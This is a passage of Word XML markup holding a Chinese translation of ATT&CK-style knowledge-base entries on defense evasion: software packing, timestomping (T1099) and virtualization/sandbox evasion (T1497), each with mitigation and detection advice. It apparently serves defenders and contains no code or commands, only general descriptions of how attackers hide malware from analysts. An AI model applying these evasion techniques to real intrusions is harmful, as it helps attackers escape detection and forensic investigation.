          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>给</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件加壳的实用程序称为加壳程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MPRESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。有一个很全面的已知加壳程序列表，但攻击者可能会建立并</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己的加壳技术来躲避</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不会像</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它知名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加壳</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>程序那样</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>留下过程产物。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D49F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2524"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="35D73C66" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="365A5295" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="421EE22A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="438CB7CA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D34F869" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>恶意软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142AA871" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采用启发式恶意软件检测。确保已经</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>更新</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>病毒定义并为观察到的恶意软件创建自定义签名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="087397D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55945284" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E7C21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用文件扫描来查找已知的软件加壳程序或加壳技术的相关物。加壳动作不是恶意活动的明确指示，因为合法软件也可能会使用加壳技术来减小二进制文件大小或保护专有代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8FA98A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Timestomp</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="17BC491C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3167E88D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1099</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5145C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEE09D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FBE8A7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331911F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D29BD3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>取证分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21B0D3DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D4D74C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F854285" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>Timestomping</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术用于修改文件时间戳（修改，访问，创建和更改次数），通常是模拟同一文件夹中的文件。比如，攻击者在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>自己</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改或创建的文件上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>imestomping</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，这些文件对于取证调查人员或文件分析工具而言不会很明显。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Timestomping</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术可能会与文件名伪装技术一起使用来隐藏恶意软件和工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655AE74" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20124C38" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902BD08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791AE10D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在取证技术来检测已修改时间戳文件的各个方面。可以通过文件修改监控来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>timestomping</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为。文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>修改监控可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集有关文件句柄打开的信息并可以比较时间戳值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738A763" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2B9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟化</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2B9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB2B9A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙箱逃逸</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="2B37B873" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="737A3796" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> T1497</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B35F4B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265B8602" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2030B253" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0735EB74" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机司法分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于签名检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>静态文件分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9677B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00F368E9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t>: Sunny Neo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397A7DC5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13ABCB01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409793D2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002574D2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会检查是否存在虚拟机环境</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VME</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或沙盒，以避免</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测。如果攻击者检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，他们可能会更改其恶意软件以隐藏植入物的核心功能或脱离受害者。在丢弃辅助或附加负载之前，它们还可以搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VME </w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120EAA72" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全软件发现</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内的多种方法，通过搜索安全监视工具（例如</w:t>
      </w:r>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）来实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟化</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA145D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙盒规避</w:t>
      </w:r>
      <w:r w:rsidRPr="002574D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以帮助确定它是否是分析环境。其他方法包括在恶意软件代码中使用睡眠计时器或循环，以避免在</w:t>
      </w:r>
